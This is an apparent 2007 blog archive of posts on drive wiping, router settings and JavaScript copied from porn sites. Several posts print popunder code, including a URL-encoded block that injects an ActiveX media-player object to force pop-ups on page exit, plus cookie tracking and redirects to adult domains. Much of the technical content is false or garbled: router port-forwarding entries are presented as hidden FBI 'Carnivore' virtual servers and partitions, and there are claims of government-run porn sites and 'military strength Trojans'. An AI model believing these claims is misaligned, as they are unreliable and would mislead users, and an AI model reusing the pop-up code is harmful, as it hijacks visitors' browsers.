Archive for May, 2007

Drive Wiping Basics

May 24, 2007

When it comes to life you can either wipe or clean with a bidet. When it comes to a hard drive you can only wipe and on some days everybody knows that can be a messy operation and is sometimes not quite complete.

I use Iolo Drive Scrubber which is OK but it has limits and most of the limits have very little to do with how many times you wipe. They have to do with what you wipe.

Once again, lets start with forgetting all you think you know. A big magnet is not a Gaussian chamber and setting a big magnet on your harddrive is a waste of time.

The next question is how many times you wipe and my answer is why bother with more than one on any drive you know that is there. For instance when I mount Iolo Drive scrubber in my CD rom on my new computer, it locates an A and C drive and on my old computer it locates A, B and C drives. Funny thing is, my new computer doesn’t have an A drive and after awhile I got curious. This so called A Drive is inaccessible by Fdisk using Windows 98 and I can’t access it by any method I’m aware of. So one day I decided to wipe all drives and guess what, it exists and takes up space on the hard drive.

On a new drive you may not miss 1 gig out of 100 but when it reports your 10 gig drive is a 9, you have to wonder what is stored in the lost area. When you wipe an empty drive (i.e. The B Floppy drive) it tells you there is no media to wipe yet when you scrub the identified A:/ drive it wipes it.

So how many wipes do I use. Where I can search the drive myself myself and if it’s clean, I use 1 wipe with a zero overlay and confirmation. If I can search it myself and I suspect it’s got nasties on it, I use 7 wipes and a zero overlay. And in the area I can’t access, that mysterious A Drive, I use a 35 pass Gutmann wipe which doesn’t take that much time on the much smaller space. Even if it’s only a light 1 pass sweep on the c:/ drive, I do 35 passes on the so called A:\ drive because I don’t know what’s there and I didn’t put it there.

So do I consider my drive clean – not if my life depends on it.

Seems theirs another nasty piece of work called “Dynamic Drive Overlay” or DDO which creates an “unwipeable” area on your hard drive. This survives operating systems changes from Linux to Windows and back, F Disk, Formatting and Drive wiping.

More about this when I learn to hack that crap and properly wipe myself.

PS When The drive content scare me – I drop it in a bucket and cover it with muriatic acid. Do that outside because this creates a real stinkpot.

Some code from a dangerous site.

May 20, 2007

OK, someone has been tormenting me with search terms to check up on teens18.biz which shows up in the code for young-models.org and the code is pretty much the same. A third site is named in the following segment but I will not go to the third site named as teens18.biz was even more disgusting than young-models.org and the only thing worse would be for adultsex.ws to be snuff flicks. You can read more about this trilogy of shit sites at the Fat Savage Blog.

{ var j = i + alen; if (document.cookie.substring(i, j) == arg) { return getCookieVal(j); } i = document.cookie.indexOf(” “, i) + 1; if (i == 0) break; } return “”; } function mkla(){ window.location.replace(’http://adultsex.ws/out.php?s_id=4′); if (getCookie(’teens18.biz’) != ‘visited’){ popURL = ‘http://adultsex.ws/out.php?s_id=9′; } else{ popURL = ‘http://young-models.org/?from=pics4you.org&type=blur’; } window.open(popURL).blur(); }

The new improvement in data transmission is the unusual style for the URL when you click a link using hex to hide something. A typical link from a picture reads as follows.

href = ‘go.php?link=t2/93.jpg&url=http%3A%2F%2Fteens18.biz%2Fc.php%3Fs%3D100′

Practice your hex translation – this one ain’ that tough.

Click a Link – I Dare You!

May 19, 2007

Did you ever wonder how much information you give away when you click a link? Now the following link is kind of explicit and maybe anybody who clicks it ought to be in jail for stupidity alone. After all, it comes from a porn site and is offering links to top ten porn sites, girls gone wild, bisexual women, hot single woman, nude strippers and:

Sexual Child Abuse

Now obviously, it’s from a honeypot and whether out of moral values or fear of the law, you should never click a link until you can read the code underneith. The above link was made live with the crap from kahaity.front.ru which is close enough to kiddie porn to get in trouble with the Law. The following code has had the identification altered just incase the identification number was tied to me and my machine. So here’s the code that carries the information to whoever operates the server.

href=”http://femalesex.com/Sexual_Child_Abuse.cfm&
pt=2&
vid=—7-51-055_-X04X969-31447&
rpt=2&
kt=5&
kp=2″
target=”_top”
onmouseover=”changeStatus(‘Sexual Child Abuse’);return true;”
onmouseout=”changeStatus(”);return true;”
title=”Sexual Child Abuse
id=”sk2″
name=”sk2″ >Sexual Child Abuse

The opening (a) and closing (/a) have been omitted inorder to read the code. Do what you want, but I would never click a link from a honeypot that changes my status to “Sexual Child Abuse” I may click a link to teens, young or otherwise to rip the code, but anthing that clearly says “Sexual Child Abuse” on a porn site cannot be interpreted in more than one way.

There are just some thing’s in life that I really don’t want to see or know.

Stalking the Carnivore.

May 13, 2007

Never believe that the FBI’s Carnivore is extinct. Like any other animal it actually leaves tracks while stalking you. This program is done in cooperation with your local ISP and for some reason contact is made through them. This is like a lion using a gazelle as a front to stalk a human.

It seems if you are using Norton Internet Security, your very first on line update is controlled through a contact with your local ISP. If you’re using Pccillin, you have incessant messages that your local ISP is attempting to make contact with your machine through a wireless connection – even when your using a LAN

The real proof comes when you check your Virtual Server Setup on your Internet router and all of a sudden the epiphany hits and you want to puke – not out of fear but disgust at what your government is doing to its citizens in the name of security.

A virtual server is a method of partitioning your hard drive such that every partition can operate as an independent machine. Each server will have it’s own full fledged operating system and each server can be independently rebooted. Remember when I complained about sneak a peak warrants and someone turning on my machines. Remember when I complained about by rapidly shrinking hard drive. Seems all those other independently operating servers take space and can be rebooted by their controller without being present. No shit this explains it all.

Right now my machines are set up by someone other than me to allow traffic from Virtual Servers through a private IP of 0.0.0.0 which you may recall is the IP on the router which bypasses the firewall. I have virtual servers to handle FTP (Ports 20/21), HTTP (port 80), HTTPS (port 443), DNS (port 53), SMTP (port 25), POP3 (port 110), and Telnet (port 23). Hey those are all pretty normal servers and the Russian mafia might want to use them.

How about i2eye (port 1720?) This is patent pending technology from D-link which happened to manufacture my router which is designed originally for enhanced streaming video technology to Televisions so I’m not sure why its on my machine as I have never knowingly downloaded a audio or video, and don’t have a TV card. Also, I reset the router to factory defaults three times in the past week so none of this crap should be on it.

Of course PPTP was enabled through port 1723 which allowed the virtual machine to operate on point to point contact basis through a secure channel using IPSec on port 500. No wonder I can’t figure out how to find out whats stored on my machines or how to remove it. The machines have their own operating systems, have encrypted content, unique encoded keys and are immune from programs which can snoop on them.

How do I know it’s Carnivore. Easy.

DCS 1000 is also on my machine operating through port 80. This is the new user friendly name for the FBI’s Carnivore which sounded too much like a predator.

With all this shit on my machine, it’s hard to tell what is real and what’s not. Have I been getting valid research and making actual posts or just looking at the results from virtual servers on my own machine?

And I thought The Truman Show was a fucked up movie.

Post script. So in order to get the post on line I wiped out all of that shit and reset the router while it was off line. It added NetMeeting at port 1720 and DSC-2000 to the virtual server list – Cool Technology??????

Code Translation for Young-models.org

May 11, 2007

This is the best translation I can do from The code at young-models.org.
Anyone want to explain it all? It starts with standard script opening and ends with standard closing. Have fun figuring it out – you too can visit young-models.org and get fucked.

self.focus(); self.moveTo(0,0); self.resizeTo(screen.availWidth,screen.availHeight); var xren=true; function pleaseclick() { if (xren) { self.focus(); setTimeout(‘pleaseclick()’,90000) } }
function mkla2() { pleaseclick(); }
document.write(unescape(‘1310″;1310999iie.launchURL(popURL);131099}13109}1310}1310function ver(){13109isXPSP2 13101310’)); function getCookieVal(offset) { var endstr = document.cookie.indexOf (“;”, offset); if (endstr == -1) { endstr = document.cookie.length; } return unescape(document.cookie.substring(offset, endstr)); } function getCookie(name) { var arg = name + “=”; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i

Code Break use a less than sign and space
use the word “clen”
close parentheses
Back to code

{ var j = i + alen; if (document.cookie.substring(i, j) == arg) { return getCookieVal(j); } i = document.cookie.indexOf(” “, i) + 1; if (i == 0) break; } return “”; } function mkla(){ window.location.replace(‘http://the-hun.ws/out.php?s_id=8’); if (getCookie(‘young-models.org’) != ‘visited’){ popURL = ‘http://the-hun.ws/out.php?s_id=9’; } else{ popURL = ‘http://teens18.biz/?from=pics4you.org&type=blur’; } window.open(popURL).blur(); }

What I understand looks ugly!

Porn Site Script – The rest

May 10, 2007

This is the rest of the Javascript in the header from young-models.org

{ var j = i + alen; if (document.cookie.substring(i, j) == arg)
{ return getCookieVal(j); }
i = document.cookie.indexOf(” “, i) + 1; if (i == 0) break; } return “”; } function mkla(){ window.location.replace(‘http://the-hun.ws/out.php?s_id=8’); if (getCookie(‘young-models.org’) != ‘visited’){ popURL = ‘http://the-hun.ws/out.php?s_id=9’; } else{ popURL = ‘http://teens18.biz/?from=pics4you.org&type=blur’; } window.open(popURL).blur(); }

Don’t forget the proper closing and opening!

This is truly nasty shit. I’ll publish the translation of the hex part tomorrow.

Porn Site Script – Active Line

May 10, 2007

This is the next line which causes the rest to activate in wordpress without even defining the script or code start;

a less than symbol;
The word; clen
a close paranthese;

I cant even type it as 2 symbols and the word “clen” in between or it disappears

Of course this is all from young-models.org that delivers some rally nasty shit.

Porn Site JavaScript

May 9, 2007

This is part of the code which I got to print by eliminating the script language defination and the opening
self.focus(); self.moveTo(0,0); self.resizeTo(screen.availWidth,screen.availHeight); var xren=true; function pleaseclick() { if (xren) { self.focus(); setTimeout(‘pleaseclick()’,90000) } } function mkla2() { pleaseclick(); }
document.write(unescape(‘%3Cscript%20language%3DJavaScript%3E%0D%0A%3C%21–%0D%0Avar%20isXPSP2%20%3D%20false%3B%0D%0Avar%20doExit%20%3D%20true%3B%0D%0Avar%20popURL%20%3D%20%27http%3A//the-hun.ws/out.php?s_id=1%27%3B%0D%0Avar%20prevURL%20%3D%20%27http%3A//the-hun.ws/out.php?s_id=1%27%3B%0D%0Aeval%28%22window.attachEvent%28%27onload%27%2Cver%29%3B%22%29%3B%0D%0Aeval%28%22window.attachEvent%28%27onunload%27%2Cext%29%3B%22%29%3B%0D%0Afunction%20ext%28%29%7B%0D%0A%09if%20%28isXPSP2%29%7B%0D%0A%09%09window.location.replace%28prevURL%29%3B%0D%0A%09%09if%20%28doExit%29%7B%0D%0A%09%09%09popURL%20%3D%20popURL%20+%20%27%26%26_blank%27%3B%0D%0A%09%09%09document.body.innerHTML+%3D%22%3Cobject%20id%3Diie%20width%3D0%20height%3D0%20classid%3D%27CLSID%3A6BF52A52-394A-11D3-B153-00C04F79FAA6%27%3E%3C/object%3E%22%3B%0D%0A%09%09%09iie.launchURL%28popURL%29%3B%0D%0A%09%09%7D%0D%0A%09%7D%0D%0A%7D%0D%0Afunction%20ver%28%29%7B%0D%0A%09isXPSP2%20%3D%20%28window.navigator.userAgent.indexOf%28%22SV1%22%29%20%21%3D%20-1%29%3B%0D%0A%7D%0D%0A//–%3E%0D%0A%3C/script%3E%0D%0A’)); function getCookieVal(offset) { var endstr = document.cookie.indexOf (“;”, offset); if (endstr == -1) { endstr = document.cookie.length; } return unescape(document.cookie.substring(offset, endstr)); } function getCookie(name) { var arg = name + “=”; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i

The last part doesn’t want to print without execuiting. Will expand this when I figure how.

Window Washer Sucks

May 8, 2007

Well this is a site about government porn sites, government cooperation with security firms and all that nasty stuff. So when you think of all the things sucking on those sites, there’s room for one more.

I have my Window Washer set up and updated so it should have been able to defend itself. It was programmed to run on shutdown and again on start up. So after I just started up and it ran I checked my inex.dat files. There were 69 items in history, 31 cookies and 1055 items in cache files with some of them being porn images.

I thought it was supposed to wash all traces of my windows path.

One word!

Bullshit.

Good God, All Hell’s Breaking Loose!

May 8, 2007

You can always tell your right when the people in power get pissed off. I mean if there were no military strength Trojans creating inaccessible partitions to hide shit, if young-models.org weren’t delivering those military strength Trojans to both Linux and Windows systems, if the experiments weren’t so reproducible why would anybody fuck with my ability to use looking glass sites to track the IP of young-models.org to their multiple server locations. I was IP Blocked all afternoon after my last few posts.

This is a decided lack of military inelegance [oxymoron at best] as it seems to confirm that the publication of porn from the government archive is a government operation.